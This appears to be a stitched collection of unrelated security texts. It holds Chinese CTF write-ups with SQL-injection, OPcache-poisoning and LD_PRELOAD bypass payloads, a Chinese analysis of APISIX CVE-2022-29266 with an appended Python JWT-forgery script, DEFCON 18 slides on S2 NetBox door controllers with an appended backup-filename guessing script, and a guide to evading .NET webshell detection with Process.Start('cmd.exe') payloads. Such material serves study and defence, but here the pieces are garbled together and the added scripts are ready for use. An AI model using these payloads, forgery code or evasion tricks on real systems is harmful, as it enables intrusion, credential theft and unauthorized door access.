-1): if i % 3 == 0: S0 = c_int(S0+SC).value if i % 3 == 2: S0 = c_int(S0+SA).value if i % 3 == 1: if i 
% 2 == 0: S0 = c_int(S0+SB).value else: S0 = c_int(S0-SB).value print hex(S0) print S0 Debug debug blocker 反调试,程序的验证步骤: 1.验证 flag 的长度是否为 32,格式为[a-z0-9]+ 2.把每两个字符的 16 进制字符串转换为整数,这一步会导致多解 3.每 4 个字节倒置 4.每 8 个字节做 128 轮的 TEA 加密,key 为’3322110077665544BBAA9988FFEEDDCC’ 5.最后把加密后的 16 个字节与 0x31 异或后与一个给定的字节数组比较 Uplycode 好多的自解密。。。程序的验证步骤: 1.flag 开头是否为 alictf{,把末尾的}改为空字节 2.验证第 8-9 字节,直接爆破得到为 Pr 3.验证 10-13 字节,直接爆破得到为 0bl3,我好暴力。。。 4.用 13 字节异或 14 字节的值解密接下来的验证函数,根据之前的规律知道自解密出来的第 一个字节为 0x55,因此 14 字节为 M 5.对第 14 字节到最后的字节(不包括{)计算 MD5 值与 35faf651b1a72022e8ddfed1caf7c45f 比较 6.验证第 19 字节到最后的字节(不包括{)是否为 A1w4ys_H3re,因此爆破第 15-18 字节就 可以得到 flag xxFileSystem2 在队友们的帮助下做出的,xxdisk.bin 的开头 20000 个字节是一个使用表,0 表示未使用,1 表示已使用,文件系统中的文件的开头第 1-4 个字节为在使用表中的索引值,第 5-8 个字节 为 FFFFFFFF,之后每 4 个字节是文件分块的索引值,一共 22 块,之后四字节是文件块使用 的标记,再之后 4 字节是文件大小,跳过 4 字节之后是文件名,删除文件时会把使用表对应 索引的值设为 0,通过这个规则可以遍历 xxdisk.bin,找到了 1000 多个删除的文件,输出文 件名发现一个奇怪的 555 文件,然后抽取出 555 文件的内容 file = open('xxdisk.bin', 'rb') data = file.read() out = open('extract', 'wb') out.write(data[0x5024+(0x333<<9):0x5024+(0x333<<9)+512]) out.write(data[0x5024+(0x32c<<9):0x5024+(0x32c<<9)+512]) out.write(data[0x5024+(0x32d<<9):0x5024+(0x32d<<9)+512]) out.write(data[0x5024+(0x324<<9):0x5024+(0x324<<9)+512]) out.write(data[0x5024+(0x325<<9):0x5024+(0x325<<9)+512]) out.write(data[0x5024+(0x326<<9):0x5024+(0x326<<9)+512]) out.close() 抽取出来之后是一个压缩包,然而在 ubuntu 下怎么都解压不了,然后队友把它丢到 windows 中用 winrar 一下就解压出来了,在解压出来的文件中得到 flag Web Find password 根据题目信息,大意就是让我们去找 HHHH 这个用户的密码,注册时候发现任意注册 HHHH, 登陆进去: http://114.55.1.176:4458/detail.php?user_name 这里发现存在注入,然后发现有 waf,经过测 验,发现 select,or,and 等等需要双写绕过,最后 payload: http://114.55.1.176:4458/detail.php?user_name=- 2%27%0Aununionion%0Aselselectect%0Auser_pass,2,3,4%0Afrfromom%0Atest.users%0Aununio nion%0Aselselectect%0A1,2,3,4%0Aoorr%0A%271 拿到 flag: Homework 开始又是注入= = 随手注册一个用户,进去以后,发现可以任意上传文件,不过不能 geishell,没有太大用处。 在文件描述那里发现存在注入: 很友好地没有多少过滤。然后走坑之旅开始。发现利用 outfile 这些可以写东西,但是也没有 太大的用处,于是,fuzz 了下,发现存在 info.php 和 phpinfo.php,info 大致提示我们 flag 在 根目录下,不用去找了,再次贴心,接着看下 phpinfo,居然是 php7,想起了前阵子的漏洞: http://drops.wooyun.org/web/15450:利用 PHP7 的 OPcache 执行 PHP 代码。 当然这里必须要有一个上传漏洞才能去配合这个漏洞,一开始已经说了可以任意上传,当然 包括 php,我们知道缓存是优于其本体,而我们可以注入写文件,phpinfo 也已经告诉了我 们一些敏感路径,于是思路很明确了: 但是写的时候,我们会发现,如果用 outfile 写的话,mysql 会把 16 进制的一些东西转换, 导致面目全非,于是利用 dumpfile 可以很好的解决这一个问题,于是先探针下,最终 payoad: http://121.40.50.146/detail.php?id=- 1%27%20union%20select%20unhex('4F5043414348450033396230303561643737343238633432 37383831343063363833396536323031C00200000000000000000000000000000000000000000 0000000000000000000EF0D070F190D0000A80100000000000002000000000000080000000000 上传php,但 不访问 计算环境的id 利用注入把 bin写进相应 的缓存目录 然后访问php 000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000FFFFFFFF04000000400200000000000000000000010000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000A801000000000000010 00000020000000000000000000000FFFFFFFF020000000002000000000000080000005858354F0 000000000000000000000000000000000000000000000000000000000000000000000000000000 0010000000700000012000000FEFFFFFF0000000000000000000000000000000000080000FFFFFF FF000000000000000020610689AC7F0000010000000700000012000000FEFFFFFF000000000000 0000000000000000000010000000FFFFFFFF0000000000000000B0590689AC7F00000000000000 0000000000000000000000000000000000000001000000000000000000000000000000C002000 000000000000200000000000000000000000000000000000000000000000000000000000000000 000660DC4980000000000000000040000000606000019C2A9A742FDC1F029000000000000002F 
7661722F7777772F68746D6C2F75706C6F61642F32303136303630353132353733372D312E7068 700000000000000000000000000000000000000000000000200200000000000006000000000000 00010000000000000004000000FFFFFFFF0100000006060000F9E0F8ABB5D00080070000000000 0000706870696E666F00C0E10E89AC7F000060000000000000000000000000000000020000003 D080108E0A10E89AC7F000000000000000000006000000000000000020000003C08080480EE0B 89AC7F000060000000000000000000000000000000020000002804080880570F89AC7F0000100 000000000000000000000FFFFFFFF020000003E010808')%20into%20dumpfile%20%27/tmp/OPc ache/39b005ad77428c42788140c6839e6201/var/www/html/upload/20160605125737- 1.php.bin%27--+ 访问下 ok: OK,题目第一关已经成功过坑,看下 disable-functions: 限制好死。。。觉得无望了。。。但是传了一句话后,不知道为什么 eval 可以执行: 然后找 bypass 的资料,在 drop 发现这么一个科技: http://drops.wooyun.org/tips/16054 利用环境变量 LD_PRELOAD 来绕过 php disable_function 执行系统命令。然后瞬间有些懵逼地样子,so 是什么玩意,作为一只 web 狗只看过没接触 过,好在文章写得比较容易明白,根据文章的思路,就是我们可以编译 so,然后利用 php 去 访问,从而绕过 php 的诸多限制,也就是说我们利用 c 的函数去列目录读文件之类的,payload 如下: #include <dirent.h> #include <stdio.h> #include <stdlib.h> #include <string.h> void payload() { DIR* dir; struct dirent* ptr; dir = opendir("/"); FILE *fp; fp=fopen("/tmp/venenoveneno","w"); while ((ptr = readdir(dir)) != NULL) { fprintf(fp,"%s\n",ptr->d_name); } closedir(dir); fflush(fp); } int geteuid() { if (getenv("LD_PRELOAD") == NULL) { return 0; } unsetenv("LD_PRELOAD"); payload(); } 然后 gcc 编译成 so,然后根据前面的点,我们明白了出题人的思路: 做到这里,还有题目最后一个坑,就是生成的东西没权限去读,那么怎么办,于是前面传的 shell 用了用处,我们可以利用 copy 命令,去覆盖一个我们之前上传的 bin,于是直接列目 录: 然后再利用 loadfile 读就可以了: 发现 flag,然后再进行一次类似操作,利用 fopen 去读文件,最后成功得到 flag: 编译好so后, 直接上传 利用第一步 的方法生成 bin写进缓存 然后访问执 行任意命令
pdf
1 APISIX CVE-OLOO-OXOTT 漏洞分析与复现 漏洞描述 影响版本 前要介绍 APISIX JWT 漏洞分析 环境搭建 漏洞复现 漏洞代码修复 修复⽅案 总结 CVE-2022-29266 这个漏洞已经出现有些时间了,正好现在有时间,⽹上也出现了不少分析⽂章,今 天来看看这个漏洞。 在 2.13.1 之前的 Apache APISIX 中,由于 APISIX 中的 jwt-auth 插件依赖于 lua-resty-jwt 库,⽽在 lua-resty-jwt 库返回的错误信息中可能会包含 JWT 的 sceret 值,因此对于开启了 jwt-auth 插件的 APISIX 存在 JWT sceret 的泄露,从⽽造成对 JWT 的伪造⻛险。 低于 2.13.1 的 Apache APISIX 全部版本。 Apache APISIX 是⼀个由 Apache 基⾦会孵化的⼀个开源的云原⽣ API ⽹关,具有⾼性能、可扩展的特 点,与传统的 API ⽹关相⽐,APISIX 是通过插件的形式来提供负载均衡、⽇志记录、身份鉴权、流量控 制等功能。 漏洞描述 影响版本 前要介绍 APISIX 2 JSON Web Token 缩写成 JWT,常被⽤于和服务器的认证场景中,这⼀点有点类似于 Cookie ⾥的 Session id JWT ⽀持 HS256、RS256、RS512 等等算法,JWT 由三部分构成,分别为 Header(头部)、 Payload(负载)、Signature(签名),三者以⼩数点分割。 JWT 的第三部分 Signature 是对 Header 和 Payload 部分的签名,起到防⽌数据篡改的作⽤,如果知道 了 Signature 内容,那么就可以伪造 JWT 了。 JWT 的格式类似于这样: 实际遇到的 JWT ⼀般是这种样⼦ ⾸先根据官⽅仓库的漏洞修复代码定位到 /apisix/plugins/jwt-auth.lua ⽂件的第 364 ⾏,如果 JWT ⽆ 效则在 return 返回 401 并给出⽆效的原因,即 jwt_obj.reason JWT 漏洞分析 Plain Text 复制代码 Header.Payload.Signature 1 Plain Text 复制代码 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6 IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV _adQssw5c 1 3 接着在 lua-resty-jwt 库中找到 lib/resty/jwt.lua ⽂件,在 jwt.lua ⽂件的 782 ⾏中,可以看到有个 jwt_obj.reason 中包含了 secret,这⾥代码的意思是说,如果程序执⾏正常就返回 secret 的值,否则 就返回具体的异常信息。 那么接下来要做的就是怎么样构建 payload 才能让代码进⼊到第 782 ⾏,从⽽让 jwt_obj.reason 返回 我们想要的 secret 呢?那么就要看看 782 ⾏上⾯的代码。 .. 表示字符串拼接,即把后⾯代码的值拼接到字符串中 err and err or secret 所表示的意思是:如果 err 为 nil,则返回 secret 的值,否则返回 err 4 通过上图可以看到,如果想执⾏到第 782 ⾏,需要满⾜四个条件,分别如下: 756 ⾏,JWT 的算法需要是 RS256 或者 RS512 758 ⾏,trusted_certs_file 值需要为 nil 774 ⾏,secret 值不能为 nil 781 ⾏,cert 的值需要为 nil 或者 false ⾸先,第⼀个条件,JWT 的算法需要是 RS256 或者 RS512,这个很简单,只需要 JWT 的 header 部分 的 alg 参数为 RS256 或者 RS512 即可。 接着,第⼆个条件,trusted_certs_file 即信任证书⽂件,APISIX 默认算法是 HS256,⽽ HS256 和 HS512 不⽀持这种证书⽂件的⽅式,因此只要我们使⽤ HS256 或者 HS512 算法就⾏了。 ● ● ● ● ~= 表示不等于 5 然后,第三个条件,secret 值不能为 nil,当 APISIX 使⽤ jwt-auth 插件的时候,如果使⽤的默认算 法,就需要指定 secret 的值,那么这个 secret 的值就不会是 nil 了。 最后,第四个条件,cert 的值需要为 nil 或者 false,在 776 ⾏⾄ 779 ⾏的代码中,可以看到会判断 secret 中有没有 CERTIFICATE 和 PUBLIC KEY,如果有那么 cert 就不会是 nil 了,那么也就是说,只 要 secret 中没有 CERTIFICATE 和 PUBLIC KEY,代码就会执⾏到第 782 ⾏,并且返回 secret 的值。 所以分析到这⾥就基本清楚了,漏洞利⽤的前提有以下三个: APISIX 需要开启 jwt-auth 插件 jwt-auth 插件算法需要是 HS256 或者 HS512 secret 的值中不能包含 CERTIFICATE 和 PUBLIC KEY 字符串 如果满⾜了这三个前提,当我们利⽤ RS256 或者 RS512 的 JWT 值发送给 APISIX 的时候,我们就会得 到 jwt-auth 中的 secret,从⽽实现 JWT 伪造了。 那么下⾯就开始搭环境,复现,顺便验证下漏洞分析的正确性。 在 VulnHub 上有 APISIX CVE-2020-13945 漏洞的靶场,APISIX 版本为 2.11.0,因此我们可以直接⽤ 这个靶场作为 CVE-2022-29266 的靶场进⾏复现。 环境搭建命令: 访问 http://your-ip:9080 地址即可 ⾸先需要⼀个 RS256 算法的 JWT 值,这⾥为了⽅便直接在 jwt.io 中⽣成,只需要将算法改为 RS256, Payload 改为以下内容即可,注意 Payload 中的 key 值需要和下⾯创建 consumer 对象时的 key ⼀致。 ● ● ● 环境搭建 漏洞复现 Plain Text 复制代码 git clone https://github.com/vulhub/vulhub.git cd vulhub/apisix/CVE-2020-13945 docker-compose up -d 1 2 3 6 ⽣成的 JWT 值如下: Plain Text 复制代码 {"key": "rs-key"} 1 7 接着创建⼀个 consumer 对象,并设置 jwt-auth 的值,默认是 HS256 算法,secret 值为 teamssix- secret-key 然后再创建 Route 对象,并开启 jwt-auth 插件 Plain Text 复制代码 eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJrZXkiOiJycy1rZXkifQ.mF27BBWlXPb3f TiFufhcL3K9y99b8kioMmp7eMwRhB1kZjK62aJ_R6SB0A_Kmym8a7U2S3zYLue9mkD4FGGmhw mkmUGppjZdtwfxrZc7JvvdpJbihNGxdfn9ywUspr6DX831e29VAy1DnLT6cU8do_9MFklxrRb hTVpDOsOADEhh6Q5zdTKPz3h5pKHSQYO4y5Xd0bmRM7TqRvhfIRchmvroaJBQjP6TrDrN_x2e lRpPsuabYmCNH_G7m6x5ouf0bqoOkOmsk3alJ6zNZFDY6-aTS4vDD8SDlSbAXkCh5DN- C10YQ6ZYWUGmcbap7hQhaIVJRlZRtaXMFbmabLwhgg 1 Plain Text 复制代码 curl http://127.0.0.1:9080/apisix/admin/consumers -H 'X-API-KEY: edd1c9f034335f136f87ad84b625c8f1' -X PUT -d ' { "username": "jack", 
"plugins": { "jwt-auth": { "key": "rs-key", "secret": "teamssix-secret-key" } } }' 1 2 3 4 5 6 7 8 9 10 8 这时其实漏洞环境才算搭好,接下来就可以开始发送 Payload 了 将刚才由 RS256 算法⽣成的 JWT 值发送给 HS256 算法验证的路由,这样就可以获得刚才设置的 secret 值了。 Plain Text 复制代码 curl http://127.0.0.1:9080/apisix/admin/routes/1 -H 'X-API-KEY: edd1c9f034335f136f87ad84b625c8f1' -X PUT -d ' { "methods": ["GET"], "uri": "/index.html", "plugins": { "jwt-auth": {} }, "upstream": { "type": "roundrobin", "nodes": { "0.0.0.0:80": 1 } } }' 1 2 3 4 5 6 7 8 9 10 11 12 13 14 Plain Text 复制代码 curl http://127.0.0.1:9080/index.html? jwt=eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJrZXkiOiJycy1rZXkifQ.mF27BBWlX Pb3fTiFufhcL3K9y99b8kioMmp7eMwRhB1kZjK62aJ_R6SB0A_Kmym8a7U2S3zYLue9mkD4FG GmhwmkmUGppjZdtwfxrZc7JvvdpJbihNGxdfn9ywUspr6DX831e29VAy1DnLT6cU8do_9MFkl xrRbhTVpDOsOADEhh6Q5zdTKPz3h5pKHSQYO4y5Xd0bmRM7TqRvhfIRchmvroaJBQjP6TrDrN _x2elRpPsuabYmCNH_G7m6x5ouf0bqoOkOmsk3alJ6zNZFDY6-aTS4vDD8SDlSbAXkCh5DN- C10YQ6ZYWUGmcbap7hQhaIVJRlZRtaXMFbmabLwhgg -i 1 9 当我们拿到这个 sceret 值后,就可以伪造 JWT Token 了。 那么根据上⾯的漏洞分析,这⾥如果使⽤ RS512 算法应该也能触发这个漏洞,在 jwt.io 上⽣成 RS512 的 JWT 值如下: 10 利⽤ curl 访问 果然使⽤ RS512 算法同样可以触发,说明漏洞分析的没⽑病。 接着看看如果 secret 中包含了 CERTIFICATE 和 PUBLIC KEY 字符串,会返回什么。 重新开⼀个环境后,创建⼀个 consumer 对象,这次 secret 设置为 teamssix-CERTIFICATE Plain Text 复制代码 eyJhbGciOiJSUzUxMiIsInR5cCI6IkpXVCJ9.eyJrZXkiOiJycy1rZXkifQ.bMCMT2wCP8X6d uvDDuaR232ae3XkA3d2g-FKvI-D73sk8nTRWZEfovoh_FFi5PquyC81J5i5bED- rh1RMuDHlJVMYDKTP-EPdoRxugBdCCq9iEL3A004PTQM21rWLcPe1SOqp2Qvcf41iH- 5r5Zs5cuAraQm4qFyhooCziSIPNnbyb8VUMx6k7fGS-WIBMVti- SjG5dEGLwAckCjc_XYMPrHqMRFYU_sB6jY05xX_9u5PFnuOQiu-q3c7gZLHdVSzHeYQGct- nrjcrM2VHvdkMIwMOr25UMhu200HFDhpLXuWpic7WC- rtztTZOtZne7UZ4s6MlnJavZiXWEq3Ovew 1 Plain Text 复制代码 curl http://127.0.0.1:9080/index.html? jwt=eyJhbGciOiJSUzUxMiIsInR5cCI6IkpXVCJ9.eyJrZXkiOiJycy1rZXkifQ.bMCMT2wCP 8X6duvDDuaR232ae3XkA3d2g-FKvI-D73sk8nTRWZEfovoh_FFi5PquyC81J5i5bED- rh1RMuDHlJVMYDKTP-EPdoRxugBdCCq9iEL3A004PTQM21rWLcPe1SOqp2Qvcf41iH- 5r5Zs5cuAraQm4qFyhooCziSIPNnbyb8VUMx6k7fGS-WIBMVti- SjG5dEGLwAckCjc_XYMPrHqMRFYU_sB6jY05xX_9u5PFnuOQiu-q3c7gZLHdVSzHeYQGct- nrjcrM2VHvdkMIwMOr25UMhu200HFDhpLXuWpic7WC- rtztTZOtZne7UZ4s6MlnJavZiXWEq3Ovew -i 1 11 创建 Route 对象,并开启 jwt-auth 插件 触发漏洞 Plain Text 复制代码 curl http://127.0.0.1:9080/apisix/admin/consumers -H 'X-API-KEY: edd1c9f034335f136f87ad84b625c8f1' -X PUT -d ' { "username": "jack", "plugins": { "jwt-auth": { "key": "rs-key", "secret": "teamssix-CERTIFICATE" } } }' 1 2 3 4 5 6 7 8 9 10 Plain Text 复制代码 curl http://127.0.0.1:9080/apisix/admin/routes/1 -H 'X-API-KEY: edd1c9f034335f136f87ad84b625c8f1' -X PUT -d ' { "methods": ["GET"], "uri": "/index.html", "plugins": { "jwt-auth": {} }, "upstream": { "type": "roundrobin", "nodes": { "0.0.0.0:80": 1 } } }' 1 2 3 4 5 6 7 8 9 10 11 12 13 14 12 可以看到,这⾥并没有返回刚才设置的 secret 值,⽽是返回了 not enough data,即 err 的信息,这表 明此时 cert 的值已经不为 nil 了,再次证明了上⾯的分析。 观察 APISIX 的漏洞修复信息,可以看到对 jwt-auth.lua ⽂件的第 364 和 395 ⾏进⾏了修改,修复信息 地址: https://github.com/apache/apisix/commit/61a48a2524a86f2fada90e8196e147538842db89 漏洞代码修复 Plain Text 复制代码 curl http://127.0.0.1:9080/index.html? 
jwt=eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJrZXkiOiJycy1rZXkifQ.mF27BBWlX Pb3fTiFufhcL3K9y99b8kioMmp7eMwRhB1kZjK62aJ_R6SB0A_Kmym8a7U2S3zYLue9mkD4FG GmhwmkmUGppjZdtwfxrZc7JvvdpJbihNGxdfn9ywUspr6DX831e29VAy1DnLT6cU8do_9MFkl xrRbhTVpDOsOADEhh6Q5zdTKPz3h5pKHSQYO4y5Xd0bmRM7TqRvhfIRchmvroaJBQjP6TrDrN _x2elRpPsuabYmCNH_G7m6x5ouf0bqoOkOmsk3alJ6zNZFDY6-aTS4vDD8SDlSbAXkCh5DN- C10YQ6ZYWUGmcbap7hQhaIVJRlZRtaXMFbmabLwhgg -i 1 13 这⾥是将原来的直接返回报错原因改成了返回 JWT token invalid 和 JWT token verify failed 的⽂本信 息。 升级⾄ Apache APISIX 2.13.1 及以上版本 安装补丁包,补丁包地址详⻅:https://apisix.apache.org/zh/blog/2022/04/20/cve-2022- 29266 这个漏洞最终造成的⻛险是 JWT 伪造,但前提是需要对⽅的 APISIX 开启了 jwt-auth 插件才⾏,并且 如果有细⼼的读者可能会发现,当我们构造 RS256 算法的 JWT 时,需要先知道⽬标 APISIX consumer 对象的 key 值,因此这个漏洞利⽤起来还是有⼀定限制的。 这篇⽂章也已经同步到了 T Wiki 云安全知识⽂库中,⽂库地址:wiki.teamssix.com,⽂库中都是云安 全相关的⽂章,并且有很多来⾃⼤家共同贡献的云安全资源,也⾮常欢迎你⼀起来补充 T Wiki 云安全知 识⽂库。 修复⽅案 ● ● 总结 14 参考链接: https://t.zsxq.com/mqnAeeY https://www.jianshu.com/p/1b2c56687d0d https://teamssix.com/211214-175948.html https://apisix.apache.org/blog/2022/04/20/cve-2022-29266 https://zone.huoxian.cn/d/1130-apache-apisix-jwt-cve-2022-29266 由于笔者个⼈的技术⽔平有限,因此如果⽂章中有什么不正确的地⽅,欢迎在留⾔处指正,不胜感 激。
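As a small addendum to the write-up above: once the secret has leaked through the jwt-auth error message, forging a valid token is only a few lines of work. The sketch below is not part of the original article; it signs an HS256 JWT with nothing but the Python standard library, reusing the same consumer key (rs-key) and secret (teamssix-secret-key) as the lab environment above. In a real engagement the secret would simply be whatever value the error message returned.

Python

    import base64, hashlib, hmac, json

    def b64url(data):
        # JWT uses unpadded base64url encoding
        return base64.urlsafe_b64encode(data).decode().rstrip("=")

    def forge_hs256(secret, payload):
        header = {"alg": "HS256", "typ": "JWT"}
        signing_input = (b64url(json.dumps(header, separators=(",", ":")).encode())
                         + "."
                         + b64url(json.dumps(payload, separators=(",", ":")).encode()))
        sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
        return signing_input + "." + b64url(sig)

    # secret leaked via the jwt-auth error message, key taken from the consumer object
    print(forge_hs256("teamssix-secret-key", {"key": "rs-key"}))
    # send the printed value as ?jwt=<token> to any route protected by the jwt-auth plugin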
“We don’t need no stinkin’ badges!” Shawn Merdinger security researcher DEFCON 18 Hacking electronic door access controllers Outline • EDAC technology – Trends, landscape – Vendors – Architecture • EDAC real-world analysis – S2 Security NetBox • Research, exposure, vulnerabilities, attacks • Countermeasures & recommendations Learning outcomes • Awareness of security issues in EDAC systems • Major players, vendors, resellers • Pen-testing knowledge • Research and testing methods Q . About security of buildings around town….what was your response? ATTY GEN. RENO: “Let's do something about it.” Q. Is this a good thing that has happened? ATTY GEN. RENO: I think any time you expose vulnerabilities, it's a good thing. Department of Justice Weekly Media Briefing, 25 May 2000 “When hackers put viruses on your home computer it's a nuisance; when they unlock doors at your facility it's a nightmare.” John L. Moss, S2 Security CEO STAD, Volume14, Issue 1. 1 January, 2004 Choice quotations EDAC Technology Overview • Trend is towards IP from proprietary solution – Convergence of IP, Video – Adding other building systems (HVAC, elevators, alarms) – Cost savings, integration, increased capabilities • Most controllers use embedded Linux • Wide range of vendors in EDAC space S2 Security Honeywell HID Global Vertx Ingersoll-Rand Bosch Security Reach Systems Cisco Systems (Richards Zeta) Brivo DSX Access RS2 Technologies Synergistics EDAC Deployment • Often you’ll see – Managed by building facilities people – Stuck in a closet and forgotten – Long lifecycles of 5-10 years • Distanced from IT Security – Physical security is not your domain. It’s ours. – Patching, upgrades, maintenance. What? Huh? – Policies regarding passwords, logging don’t apply – 3rd party local service contractor adds doors, hardware configuration EDAC Architecture S2 Security NetBox • Built by S2 Security • 9000+ systems installed worldwide – Schools, hospitals, businesses, LEA facilities, etc. • Same box is sold under multiple brand names – Built by S2 Security • NetBox – Distributed by Linear • eMerge 50 & 5000 – Resellers’ re-branding • Sonitrol eAccess S2 Security NetBox S2 Security: Reading up • Preparation and information gathering – S2 Security case studies, press releases – “The Google” – Lexis-Nexis Academic Universe, ABI-Inform, etc. • Example: able to determine from http://tinyurl.com/s2mysql – Samba client – MySQL, MyISAM – Lineo Linux distribution (just like Zarus! ) – Processor is ARM Core IXP 425 chip @ 533 MHz – Only 15 months from design to 1st customer shipping – “S2 did not have much prior experience with open source” – “MySQL is used to store everything from reports, user information, customized features, facility diagrams, and more” NetBox Components • HTTP • MySQL / Postgres • NmComm • FTP/Telnet • Features! NetBox Component: HTTP Server • GoAhead Webserver TCP/80 • Poor choice – Sixteen CVEs • CVE-2003-1568, CVE-2002-2431, CVE-2002-2430, CVE- 2002-2429, CVE-2002-2428, etc. • No vendor response – Typical example in CVE-2002-1951 • Vendor response: GoAhead….contacted on three different occasions during the last three months but supplied no meaningful response. "Data security is a challenge, and unfortunately, not everyone has risen to it.“ John L. Moss, S2 Security CEO NetBox Component: MySQL • MySQL server listening on 3306 • Outdated SQL – Version 2.X uses MySQL version 4.0 • 3.X uses Postgres – Just how old is MySQL 4.0? • WTF? End of DOWNLOAD? 
NetBox Component: NmComm • Service listening on TCP/7362 • Performs multicast discovery of nodes • Daemon coded by S2 Security • Patent issued 15 December, 2009 – “System and method to configure a network node” • http://tinyurl.com/s2patent “Gentlemen, start your fuzzers!” NetBox Component: FTP & telnet • Cleartext protocols for a security device – Telnet to manage – FTP for DB backups • Poor security-oriented documentation "We see some vendors fitting their serial devices with Telnet adapters, which simply sit on the network transmitting unsecured serial data.” John L. Moss, S2 Security CEO NetBox Components: Features! • Lots of extras and licenses options – Elevators, HVAC, Burglar – VoIP • Increases complexity • Expands attack surface – Daemons – Libraries NetBox Components: Features! • View floorplans NetBox unauthenticated reset • VU#571629 • Remote, unauthenticated factory reset via crafted URL NetBox Unauth Access to Backup • VU#228737 – Unauth attacker can dload DB backups – Nightly DB backup is hardcoded CRONJOB • File name is “full_YYYYMMDD_HHMMSS.1.dar” • Predictable naming convention with timestamp • Uncompress the.dar format – Backup DB is in “var/db/s2/tmp/backup/all.dmp” – Attacker gets backup DB = Game Over • Entire system data in DB! NetBox Unauth Access to Backup • Extraction of administrator MySQL_64bit hash • Affects NetBox 2.X (mysql) and 3.X (postgres) • Hash is trivial to crack • Attacker now has admin access NetBox Pwnage: Doors • Open any door – Right now – Or schedule NetBox Pwnage: Cameras • Backup file contains IP camera information – Name, IP address, admin username and password • NetBox 2.X and 3.X systems vulnerable • Attacker now owns IP cameras "Most hackers don't care about watching your lobby. If they gain access to the network, they're going to go after financial data and trade secrets.” Justin Lott, Bosch security marketing NetBox Pwnage: DVRs • User/Pass to DVRs in backup DB • Poor setup guides for DVRs • Recommends keeping default user/pass – On-Net Surveillance Systems Network Video Recorder document NetBox Fingerprinting • Remote Identification – MAC OID registered to S2 Security – Nmap service fingerprint submitted (nmap 5.20) Recommendations: Vendor • Vendor – Conduct security evaluations on your products – Provide secure deployment guides – Tighten-up 3rd party integration – Improve • Logging – More details: changes, auditing, debug levels – Ability to send to log server • HTTP – Use a “better” HTTP daemon – Enable HTTPS by default – Modify banners, reduce footprint, etc. • FTP – Change to SFTP • Telnet – Change to SSH Recommendations: Customers – Demand better security! • From vendor, reseller, and service contractor • Expect fixes and patches – Manage your EDAC like any other IT system • Patching, change management, security reviews – Technical • Isolate eMerge system components – VLANs, MAC auth, VPN, restrict IP, etc. Questions? • Contact – Follow-up questions – Security evaluations scm@hush.com http://www.linkedin.com/in/shawnmerdinger
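A short illustration of why the predictable backup name in VU#228737 mattered: because the nightly cron job always wrote full_YYYYMMDD_HHMMSS.1.dar, an unauthenticated attacker only had to guess the timestamp for the previous night. The sketch below is a minimal guessing loop; the NetBox address and the /backup/ path are placeholders (the real location depends on the firmware build), the seconds field is assumed to be 00, and patched units no longer expose the file at all.

Python

    import datetime as dt
    import requests   # assumes the dump is reachable over the built-in web server

    BASE = "http://192.0.2.10"    # placeholder NetBox address
    PATH = "/backup/"             # placeholder path to the nightly dump

    def candidates(day):
        # nightly cron job at a fixed but unknown HH:MM, seconds assumed to be 00
        for hour in range(24):
            for minute in range(60):
                yield "full_{:%Y%m%d}_{:02d}{:02d}00.1.dar".format(day, hour, minute)

    def find_backup(day):
        for name in candidates(day):
            if requests.head(BASE + PATH + name, timeout=3).status_code == 200:
                return name
        return None

    print(find_backup(dt.date.today() - dt.timedelta(days=1)))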
.NET WebShell 免杀系列Ⅱ之 Tricks 分享 Ivan1ee@dotNet 安全矩阵 [ dotNet 安全矩阵] —— 聚焦于微软.NET 安全技术,关注基于.NET 衍生出的各种红蓝攻防对抗技术、分享内容不限于 .NET 代码审计、 最新的.NET 漏洞分析、反序列化漏洞研究、有趣的.NET 安全 Trick、.NET 开源软件分享、. NET 生态等热点话题,愿你能在这里学 到实在的干货,共同推动.NET 安全氛围卷起来。 配套的[ dotNet 安全矩阵]知识星球优惠活动持续进行,每天只需要 1 块钱不到,就可以让自己从.NET 小白成为高手,因为星球里的资料 和教程很少在市面上广泛传播,价值完全划算,还可以获得阿里、蚂 蚁、字节等大厂内推实习或社招岗位的机会,欢迎对.NET 感兴趣的 小伙伴们加入我们,一起做一件有情有意义的事。 0x01 背景 .NET WebShell 绕过和免杀的方法系列第二季开始啦,接上季走硬刚 Unicode 编码绕过的方式 Bypass 主流的 webshell 查杀工具之后,本文介绍几种特殊的 免杀和绕过技巧,有助于在实战中对抗 WAF 等安全产品,希望能帮助到大 伙。 0x02 技巧一符号 2.1 逐字标识符 @符号在.NET 字符中有着特殊的意义,把“@”放在一个字符串前面,表示后面是一个逐字 字符串,@符号的这个特点使得在表示系统文件路径时很方便,就可以不再需要转义符。 使用@字符后无法在字符串中插入有效的换行符(\n)或制表符(\t),因为将被当成正常字符 串输出。例如以下 Demo 另外还可以转义.NET 平台保留的关键词,如 Class、NameSpace、int 等,参考如下 Demo string filepath = "C:\\Program Files\\wmplayer.exe"; => C:\Program Files\wmplayer.exe string filepath = @"C:\Program Files\wmplayer.exe"; => C:\Program Files\wmplayer.exe string filename = @"dotNet\tFile"; => dotNet\tFile 既然@字符可以做这么多有趣的事,咱们就研究下利用它绕过某些安全产品的防护规则, 笔者在 Process 类完整的命名空间处每个点之间都加上@符,如下 2.2 内联注释符 在.NET 项目中单个 aspx 页面里支持使用内联注释符 /**/ , 此符号只会注释掉两个*号之间 的内容,利用此特点也可以在类完全限定名每个点之间加上内联注释,如下 namespace @namespace { class @class { public static void @static(int @int) { if (@int > 0) { System.Console.WriteLine("Positive Integer"); } else if (@int == 0) { System.Console.WriteLine("Zero"); } else { System.Console.WriteLine("Negative Integer"); } } } } <script runat="server" language="c#"> public void Page_load(){ @System.@Diagnostics.@Process.@Start("cmd.exe","/c mstsc"); } </script> <%@ Page Language="C#" ResponseEncoding="utf-8" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%> <script runat="server"> public void Page_load() {System/**/.Diagnostics./**/Process/**/.Start("cmd.exe","/c calc");} </script> 0x03 语言 3.1 托管语言 c# .NET WebForm 项目通常包含多个 ASPX 文件,每个文件都是 C#语言编写服务端代码,其 @Page 